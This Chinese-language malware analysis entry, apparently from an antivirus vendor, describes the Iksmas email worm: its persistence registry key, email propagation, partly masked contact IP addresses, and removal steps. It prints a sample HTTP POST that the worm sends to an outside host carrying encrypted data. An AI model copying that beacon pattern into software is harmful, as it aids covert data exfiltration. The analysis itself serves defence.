基本介紹
- 外文名:Email-Worm/Win32.Iksmas.vv
- 病毒類型:蠕蟲
- 感染系統:Windows98以上版本
- 公開範圍:完全公開
- 檔案長度:412,160 位元組
- 開發工具:Microsoft Visual C++ 6.0
Email-Worm/Win32.Iksmas.vv,行為分析-本地行為,行為分析-網路行為,清除方案,
Email-Worm/Win32.Iksmas.vv
病毒名稱: Email-Worm/Win32.Iksmas.vv
病毒類型: 蠕蟲
檔案 MD5: 3FB87847B02D7C528BF66D291588D02B
公開範圍: 完全公開
危害等級: 4
檔案長度: 412,160 位元組
感染系統: Windows98以上版本
開發工具: Microsoft Visual C++ 6.0
行為分析-本地行為
1、該病毒為蠕蟲類病毒,該病毒做了加密處理,病毒運行後,添加註冊表啟動項、蠕蟲通過計算機網路的安全漏洞對安全性低的機器連線到網路。
2、病毒通過電子郵件傳播傳送自己的副本,病毒會消耗大量的系統資源,導致機器明顯緩慢下降,病毒連線網路向大量IP位址提交加密數據信息。
3 添加註冊表啟動項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg
值: 字元串: "病毒名.exe"
描述:添加註冊表啟動項
行為分析-網路行為
協定:TCP
連線埠:80
試圖連線以下IP位址提交數據(IP位址可能會不定變化)
84.72.231.15*
213.46.159.22*
124.123.106.18*
4.161.232.21*
217.219.176.74*
213.46.159.22*
65.189.174.34*
82.243.237.91*
84.72.231.15*
描述:連線以上IP以以下格式訪問與返回信息:
POST /hstdztlezkam.png HTTP/1.1
Referer: Mozilla
Accept: **
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla
Host: 84.72.231.15
Content-Length: 957
Cache-Control: no-cache
a=_wAAArnIMlCW5P70x45JNcA28wsTx6HcZN-CyirzePWkjuar1mvM0EFPHwcTsNRhvd0wfF4x0NRHT5-
HBjf-D45q955YguLgBLuS59bHB8Tr2T5HlAU_UeWpghv-DAH1phrNWqDzU4HVvD26mS-vyluU0xlCitfDjXGn8iFWex4QhHxpBF6
-BX9KrtdJntndefK98tDUQXCwqpaYVDZnZxxH-AD4YiuzGGBCWSuvxelxndVSvY_gxM_BGxapNJMC5yrx7pAIACuhOsB5R7FGo
1kzmv2x7zEngyoRl4IaaJCE3y51wIM0yOMj1A0Wjg7VQVLdX4gAV1YtYJ4lyGSwnAekZUDhhGvI2RO_-VIoGk02CyJ9AMwfiDAV9w2htveNgOiHcUeqU77bwK0CAAOgVff5uxiZ9jaE8zBD5j9FEQzSUK5pu3QFy
UojsRt6dK3B2NpQP00SLaLSE1f50eXzvLJa0TAYy2oOLZbH7X5C7A8ywB6Sjju23DZ5A_
DBQmMu4O1aE0dTQzjroBbFWevf9M4wnCRBAZoeu3pLo9S6hKIzA_LPWksCQg7uM-nlW_N6iKsvDNnZw9g_7vWkMnnmdk-r840y7CYSyfdRLbXABZGn_AT_QubnnyxOr03_n9d2Fdjkrvqf9CbZTmKjmcknLMFAq9RfOdsmfbOwGl_
-S8PGDaHvg1PaU5WroegWfKK1xFZ6dl3VTGfDS37enKV-QHkvp8goIX6ustpuQlFO8miIODJtAppIjBGiXZtxBzhCjmBZcB1e99h31Efv_
ZjX1GF7rAEECN_uDxA_RrF9ztyQubNuUV63EviZnMswZKHb4HaWo9wN-3h_1QtjJ6z5aWo-oKpSqKsiwNfPbHwO4jOwDiVQmSTLSK
zu0H5FtvElK8Xw3GMCHDGAhgWt_-HHVoA5d1SHV1UrOeB-SPxwEvl-CdAig&b=AAAAAA
註:%System32%是一個可變路徑。病毒通過查詢作業系統來決定當前System資料夾的位置。
%Windir% WINDODWS所在目錄
%DriveLetter% 邏輯驅動器根目錄
%ProgramFiles% 系統程式默認安裝目錄
%HomeDrive% 當前啟動的系統的所在分區
%Documents and Settings% 當前用戶文檔根目錄
%Temp% \Documents and Settings\當前用戶\Local Settings\Temp
%System32% 系統的 System32資料夾
Windows2000/NT中默認的安裝路徑是C:\Winnt\System32
windows95/98/me中默認的安裝路徑是C:\Windows\System
windowsXP中默認的安裝路徑是C:\Windows\System32
清除方案
1、使用安天防線可徹底清除此病毒(推薦)。
2、手工清除請按照行為分析刪除對應檔案,恢復相關係統設定。
(1) 刪除病毒添加的註冊表項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg
值: 字元串: "病毒名.exe"
(2) 可以利用以上步驟查找病毒所在位置以名稱然後將病毒檔案刪除
